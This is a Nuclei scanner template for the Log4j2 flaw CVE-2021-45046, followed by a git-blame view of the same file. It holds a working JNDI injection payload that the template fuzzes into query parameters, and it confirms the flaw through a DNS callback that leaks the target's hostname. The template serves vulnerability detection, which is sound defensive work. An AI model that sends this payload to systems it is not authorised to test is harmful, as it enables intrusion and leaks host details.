nuclei-templates/dast/cves/2021/CVE-2021-45046.yaml

id: CVE-2021-45046-DAST

info:
  name: Apache Log4j2 - Remote Code Injection
  author: princechaddha
  severity: critical
  description: Apache Log4j2 Thread Context Lookup Pattern is vulnerable to remote code execution in certain non-default configurations.
  reference:
    - https://securitylab.github.com/advisories/GHSL-2021-1054_GHSL-2021-1055_log4j2/
    - https://twitter.com/marcioalm/status/1471740771581652995
    - https://logging.apache.org/log4j/2.x/
    - http://www.openwall.com/lists/oss-security/2021/12/14/4
    - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9
    cve-id: CVE-2021-45046
    cwe-id: CWE-502
  metadata:
    max-request: 1
    confidence: tenative
  tags: cve,cve2021,rce,oast,log4j,injection,dast

http:
  - pre-condition:
      - type: dsl
        dsl:
          - 'method == "GET"'

    payloads:
      log4j:
        - "${jndi:ldap://127.0.0.1#.${hostName}.{{interactsh-url}}}"

    fuzzing:
      - part: query
        fuzz:
          - "{{log4j}}"

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol  # Confirms the DNS Interaction
        words:
          - "dns"

      - type: regex
        part: interactsh_request
        regex:
          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${hostName} in output

    extractors:
      - type: regex
        part: interactsh_request
        group: 2
        regex:
          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print injection point in output

      - type: regex
        part: interactsh_request
        group: 1
        regex:
          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${hostName} in output
# digest: 4a0a0047304502200467421a3a87f908e224035a2fdc0fb73bd7d08eecf66f046a0d240588621b35022100b03c60899e681e43c7b4a94df8b13f392e82abc07c9dfc12f41ba3028d9b3038:922c64590222798bb761d5b6d8e72950
misc update 2024-03-23 09:32:51 +00:00			`id: CVE-2021-45046-DAST`
Added fuzzing templates 2024-03-16 18:44:49 +00:00
			`info:`
			`name: Apache Log4j2 - Remote Code Injection`
			`author: princechaddha`
			`severity: critical`
			`description: Apache Log4j2 Thread Context Lookup Pattern is vulnerable to remote code execution in certain non-default configurations.`
			`reference:`
			`- https://securitylab.github.com/advisories/GHSL-2021-1054_GHSL-2021-1055_log4j2/`
			`- https://twitter.com/marcioalm/status/1471740771581652995`
			`- https://logging.apache.org/log4j/2.x/`
			`- http://www.openwall.com/lists/oss-security/2021/12/14/4`
			`- https://nvd.nist.gov/vuln/detail/CVE-2021-44228`
			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H`
			`cvss-score: 9`
			`cve-id: CVE-2021-45046`
			`cwe-id: CWE-502`
			`metadata:`
TemplateMan Update [Fri Jun 7 10:04:28 UTC 2024] :robot: 2024-06-07 10:04:29 +00:00			`max-request: 1`
Added fuzzing templates 2024-03-16 18:44:49 +00:00			`confidence: tenative`
misc update 2024-03-23 09:32:51 +00:00			`tags: cve,cve2021,rce,oast,log4j,injection,dast`
Added fuzzing templates 2024-03-16 18:44:49 +00:00
			`http:`
format update 2024-03-31 19:55:42 +00:00			`- pre-condition:`
Added applicable filters 2024-03-26 07:21:56 +00:00			`- type: dsl`
			`dsl:`
			`- 'method == "GET"'`
Added fuzzing templates 2024-03-16 18:44:49 +00:00
			`payloads:`
			`log4j:`
			`- "${jndi:ldap://127.0.0.1#.${hostName}.{{interactsh-url}}}"`

			`fuzzing:`
			`- part: query`
			`fuzz:`
			`- "{{log4j}}"`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: interactsh_protocol # Confirms the DNS Interaction`
			`words:`
			`- "dns"`

			`- type: regex`
			`part: interactsh_request`
			`regex:`
			`- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output`

			`extractors:`
			`- type: regex`
			`part: interactsh_request`
			`group: 2`
			`regex:`
			`- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output`

			`- type: regex`
			`part: interactsh_request`
			`group: 1`
			`regex:`
			`- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output`
Auto Template Signing [Sat Jun 8 16:02:16 UTC 2024] :robot: 2024-06-08 16:02:17 +00:00			`# digest: 4a0a0047304502200467421a3a87f908e224035a2fdc0fb73bd7d08eecf66f046a0d240588621b35022100b03c60899e681e43c7b4a94df8b13f392e82abc07c9dfc12f41ba3028d9b3038:922c64590222798bb761d5b6d8e72950`